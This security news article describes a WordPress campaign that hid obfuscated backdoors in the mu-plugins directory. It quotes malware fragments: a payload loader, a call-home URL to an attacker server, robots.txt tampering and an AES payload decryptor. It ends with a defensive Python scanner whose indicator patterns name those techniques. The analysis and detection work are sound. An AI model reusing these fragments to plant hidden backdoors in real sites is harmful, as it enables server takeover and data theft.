A sophisticated malware campaign has recently been uncovered by security researchers at Sucuri, targeting WordPress websites through hidden malware and backdoors in the mu-plugins directory.
This attack chain allows remote execution of malicious code, enabling full server compromise, data theft, and persistent control over infected sites.
The /wp-content/mu-plugins/ directory – designed for “must-use” plugins that load automatically – became the attack vector. Threat actors planted a file named index.php containing obfuscated PHP code:
'.$final);
?>
When decoded, this retrieves and executes payloads from /wp-content/uploads/2024/12/index.txt.
Beyond the loader, the Sucuri analysts noted that the second-stage payload carries several additional capabilities:
- Server Communication
$xmlname = urldecode('162-er103-1.ivyrebl.fvgr');
$http = is_https() ? 'https' : 'http';
$web = $http.'://'.$goweb.'/index.php?web='.$host.'&zz='.(disbot() ? '1' : '0');
Masks communications with attacker-controlled servers while checking for security tools.
- Robots.txt Manipulation
$robotsPath = $_SERVER['DOCUMENT_ROOT'].'/robots.txt';
if (!file_exists($robotsPath)) {
file_put_contents($robotsPath, "User-agent: *\nAllow: /\nSitemap: ...");
}
Creates fake sitemaps to boost malicious SEO campaigns.
Advanced Persistence Mechanisms
A second backdoor (test-muplugin.php) used AES-128-CBC encryption for payload delivery:
$_7a5b = "l2UDM/1kihg+Pd50dO3hKCkDZKCBzafIvVT20a6iA3JU8Hmvdc+zphRj...";
function zwxyb($_7a5b, $_11f9) {
return openssl_decrypt($_7a5b, 'AES-128-CBC', substr(hash('sha256', $_11f9, true), 0, 16), 0, ...);
}
This decrypts attacker commands while evading signature-based detection.
A newly discovered malware campaign is compromising WordPress websites through credential stuffing and phishing attacks, leading to backdoor installations in the mu-plugins directory with encrypted payloads.
Once inside, the malware spreads laterally between servers, executing threats such as cryptominers, ransomware, or data exfiltration.
To mitigate this risk, website owners should enforce file integrity monitoring, block PHP execution in upload directories, reset all admin, FTP, and database credentials, and deploy web application firewalls that also monitor the mu-plugins directory.
This campaign underscores the importance of continuous WordPress security hardening, including disabling unused directories and running real-time malware scans, as 68% of infections stem from outdated components.
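As an added example (not code from the Sucuri report or the original article), the following Python script implements the mu-plugins monitoring recommended above: it records a sha256 baseline of the directory, flags files that are new or changed, and checks PHP files for the indicator patterns this article describes (openssl_decrypt, encoding helpers, a payload fetched from uploads/*.txt). The directory layout and file names in the demo are constructed for illustration.

```python
import hashlib, re, tempfile
from pathlib import Path

# Heuristics taken from the behaviours reported above; tune to your site.
INDICATORS = {
    "eval": re.compile(r"\beval\s*\("),
    "base64_decode": re.compile(r"\bbase64_decode\s*\("),
    "openssl_decrypt": re.compile(r"\bopenssl_decrypt\s*\("),
    "rot13_or_urldecode": re.compile(r"\b(?:str_rot13|urldecode)\s*\("),
    "uploads_txt_payload": re.compile(r"wp-content/uploads/[^'\"]*\.txt"),
}

def sha256_of(path: Path) -> str:
    return hashlib.sha256(path.read_bytes()).hexdigest()

def baseline(dir_path: Path) -> dict:
    """FIM baseline: sha256 of every file under dir_path, keyed by relative path."""
    return {str(p.relative_to(dir_path)): sha256_of(p)
            for p in sorted(dir_path.rglob("*")) if p.is_file()}

def scan(dir_path: Path, known: dict) -> dict:
    """Report files new or changed versus the baseline, plus indicator hits in PHP files."""
    report = {"new": [], "changed": [], "indicators": {}}
    for p in sorted(dir_path.rglob("*")):
        if not p.is_file():
            continue
        rel = str(p.relative_to(dir_path))
        if rel not in known:
            report["new"].append(rel)
        elif known[rel] != sha256_of(p):
            report["changed"].append(rel)
        if p.suffix.lower() in {".php", ".phtml"}:
            text = p.read_text(errors="ignore")
            hits = [name for name, rx in INDICATORS.items() if rx.search(text)]
            if hits:
                report["indicators"][rel] = hits
    return report

def demo() -> dict:
    """Constructed sample: one benign mu-plugin in the baseline, then a dropped index.php."""
    root = Path(tempfile.mkdtemp()) / "mu-plugins"
    root.mkdir()
    (root / "site-tweaks.php").write_text(
        "<?php\nadd_filter('xmlrpc_enabled', '__return_false');\n")
    known = baseline(root)
    (root / "index.php").write_text(  # constructed look-alike, carries indicator strings only
        "<?php\n$blob = file_get_contents($_SERVER['DOCUMENT_ROOT']"
        ".'/wp-content/uploads/2024/12/index.txt');\n"
        "$cmd = openssl_decrypt($blob, 'AES-128-CBC', $key, 0, $iv);\n")
    return scan(root, known)
```

Run baseline() once after a clean install or audit, store the result, and schedule scan() against it; any entry under "new", "changed" or "indicators" in /wp-content/mu-plugins/ warrants review.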